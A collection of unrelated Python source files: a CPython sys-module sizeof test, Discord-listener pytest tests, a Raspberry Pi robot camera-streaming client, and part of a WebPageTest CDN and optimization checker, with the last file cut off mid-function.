"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
test_discord_listener.py
|
import asyncio
import logging
import re
from unittest.mock import MagicMock
import time
import threading
import pytest
from discord.ext.commands.bot import Bot
from bot.drivers.discord_listener import _EventListenerCog
from bot.drivers import DiscordListener
logger = logging.getLogger(__name__).parent
# Testing listener starting and stoping functionalities
def _wait_for_assertion(assertion):
# add timeout mechanism
is_assertion_false = True
while is_assertion_false:
try:
assertion()
is_assertion_false = False
except AssertionError:
time.sleep(1)
def test_blocking_listener(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
# pylint: disable=unused-argument
def mock_run(token):
while not stop_running:
time.sleep(1)
def assert_bot_not_running(): # How can I make this generic????
assert DiscordListener._bot_running is False
discord_internal_bot.run = MagicMock(side_effect=mock_run)
test_thread = threading.Thread(
target=discord_listener.start_listener, args=[True])
test_thread.start()
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
stop_running = True
test_thread.join()
_wait_for_assertion(assert_bot_not_running)
def test_non_blocking_listener(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
# pylint: disable=unused-argument
def mock_run(token):
while not stop_running:
time.sleep(1)
async def stop_mock_run():
nonlocal stop_running
stop_running = True
discord_internal_bot.run = MagicMock(side_effect=mock_run)
discord_internal_bot.close = MagicMock(side_effect=stop_mock_run)
discord_listener.start_listener(False)
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
discord_listener.stop_listener()
discord_internal_bot.close.assert_called()
assert DiscordListener._bot_running is False
def test_only_one_listener_at_a_time(discord_listener: DiscordListener, discord_internal_bot: Bot):
stop_running = False
n_runs = 0
# pylint: disable=unused-argument
def mock_run(token):
nonlocal n_runs
n_runs += 1
while not stop_running:
time.sleep(1)
async def stop_mock_run():
nonlocal stop_running
stop_running = True
discord_internal_bot.run = MagicMock(side_effect=mock_run)
discord_internal_bot.close = MagicMock(side_effect=stop_mock_run)
discord_listener.start_listener(False)
_wait_for_assertion(discord_internal_bot.run.assert_called)
assert DiscordListener._bot_running is True
assert n_runs == 1
discord_listener.start_listener(False)
assert n_runs == 1
discord_listener.stop_listener()
discord_internal_bot.close.assert_called()
assert DiscordListener._bot_running is False
# Testing listener specific message handling
def _call_on_message(discord_event_listener_cog: _EventListenerCog, sample_message):
try:
asyncio.run(discord_event_listener_cog.on_message(sample_message))
except Exception as ex:
logger.exception("Test error on message: {}".format(ex))
assert False
def _invalid_author_sample_message(sample_message, author_name, author_is_bot, embeds):
sample_message.author.name = author_name
sample_message.author.bot = author_is_bot
sample_message.embeds = embeds
return sample_message
def _change_embeds_author(sample_message, author):
sample_message.embeds[0].author = author
return sample_message.embeds
def _change_embeds_author_name(sample_message, author_name):
sample_message.embeds[0].author.name = author_name
return sample_message.embeds
@pytest.mark.parametrize("change_msg, get_bot_user", [
(lambda msg: _invalid_author_sample_message(msg, "Discord bot", True, None),
lambda msg: _invalid_author_sample_message(msg, "Discord bot", True, None).author),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", False, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "notGitHub", True, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "notGitHub", False, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", True, None), lambda msg: None),
(lambda msg: _invalid_author_sample_message(
msg, "GitHub", True, []), lambda msg: None),
(lambda msg: _invalid_author_sample_message(msg, "GitHub",
True, _change_embeds_author(msg, None)), lambda msg: None),
(lambda msg: _invalid_author_sample_message(msg, "GitHub", True,
_change_embeds_author_name(msg, "notInAllowedAuthors")), lambda msg: None)
])
def test_event_on_message_invalid_author(discord_event_listener_cog: _EventListenerCog, sample_message, change_msg, get_bot_user):
msg = change_msg(sample_message)
discord_event_listener_cog._bot.user = get_bot_user(sample_message)
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock()
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock()
_call_on_message(discord_event_listener_cog, msg)
discord_event_listener_cog._jenkins_service.trigger_build.assert_not_called()
discord_event_listener_cog._discord_service.send_status_message_to_discord.assert_not_called()
def _invalid_pr_url(samples_message, embeds):
samples_message.embeds = embeds
return samples_message
def _change_embeds_url(samples_message, url):
samples_message.embeds[0].url = url
return samples_message.embeds
@pytest.mark.parametrize("change_msg", [
(lambda msg: _invalid_pr_url(msg, None)),
(lambda msg: _invalid_pr_url(msg, [])),
(lambda msg: _invalid_pr_url(msg, _change_embeds_url(msg, None))),
(lambda msg: _invalid_pr_url(msg, _change_embeds_url(
msg, "https://github.com/EvolvingVirtualAssistant/eva-cicd/unmatching-pr-url/a")))
])
def test_event_on_message_invalid_pr_url(discord_event_listener_cog: _EventListenerCog, sample_message, change_msg):
msg = change_msg(sample_message)
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock()
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock()
_call_on_message(discord_event_listener_cog, msg)
discord_event_listener_cog._jenkins_service.trigger_build.assert_not_called()
discord_event_listener_cog._discord_service.send_status_message_to_discord.assert_not_called()
def test_event_on_message(discord_event_listener_cog: _EventListenerCog, sample_message, mock_any_arg):
# pylint: disable=unused-argument
async def mock_send_status_message_to_discord(channel, msg, url):
pass
# pylint: disable=unused-argument
def mock_trigger_build(pr_url, on_complete, on_error):
pass
discord_event_listener_cog._params_repository.get_github_allowed_authors = MagicMock(
return_value=["Test"])
discord_event_listener_cog._jenkins_service.trigger_build = MagicMock(
side_effect=mock_trigger_build)
discord_event_listener_cog._discord_service.send_status_message_to_discord = MagicMock(
side_effect=mock_send_status_message_to_discord)
url = re.match(r".*\/pull\/\d+", sample_message.embeds[0].url).group()
_call_on_message(discord_event_listener_cog, sample_message)
discord_event_listener_cog._jenkins_service.trigger_build.assert_called_with(
url, mock_any_arg, mock_any_arg)
|
lineRobotClient.py
|
import io
import socket
import struct
import time
import picamera
from gpiozero import Robot
import sys
from threading import Thread
robot = Robot(left=(27,24), right=(16,23))
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect(('192.168.1.67', 8000))
connectionStream = clientSocket.makefile('wb') # write binary image file to the connection
def instruction():
time.sleep(7)
while True:
msg = clientSocket.recv(1024)
msg = msg.decode('utf-8')
if msg == '1':
#print("1 - Going Forward")
robot.forward(speed=0.5)
elif msg == '2':
robot.left()
#print("2 - Going Left")
elif msg == '3':
robot.right()
#print("3 - Going right")
elif msg == '4':
#robot.backward()
pass
elif msg == '0':
pass
#robot.stop()
elif msg == '404':
print("Quiting, bye now")
sys.exit()
else:
print("Connected to Server!")
def video():
try:
with picamera.PiCamera() as camera:
camera.resolution = (320, 240) # pi camera resolution for test(640x480)
camera.framerate = 15 # 15 frames/sec
time.sleep(2) # give 2 secs for camera to initialize
start = time.time()
stream = io.BytesIO()
# send jpeg format video stream to the server
for frame in camera.capture_continuous(stream, 'jpeg', use_video_port=True):
connectionStream.write(struct.pack('<L', stream.tell()))
connectionStream.flush()
stream.seek(0)
connectionStream.write(stream.read())
if time.time() - start > 600:
break
stream.seek(0)
stream.truncate()
connectionStream.write(struct.pack('<L', 0))
finally:
connectionStream.close()
clientSocket.close()
thread1 = Thread(target=video)
thread1.start()
thread2 = Thread(target=instruction)
thread2.start()
|
optimization_checks.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import threading
import time
import monotonic
import ujson as json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaiedge.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgekey.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azure.microsoft.com'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageRain': ['.pagerain.net'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'StackPath': ['.stackpathdns.com'],
'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'WordPress': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PUSHR': [{'Via': 'PUSHR'}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}]
}
# spell-checker: enable
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, 'wb', 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
from urlparse import urlsplit
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
pass
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
if cache is not None:
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if cache is not None:
matches = re.search(re_max_age, cache)
if matches:
time_remaining = int(matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
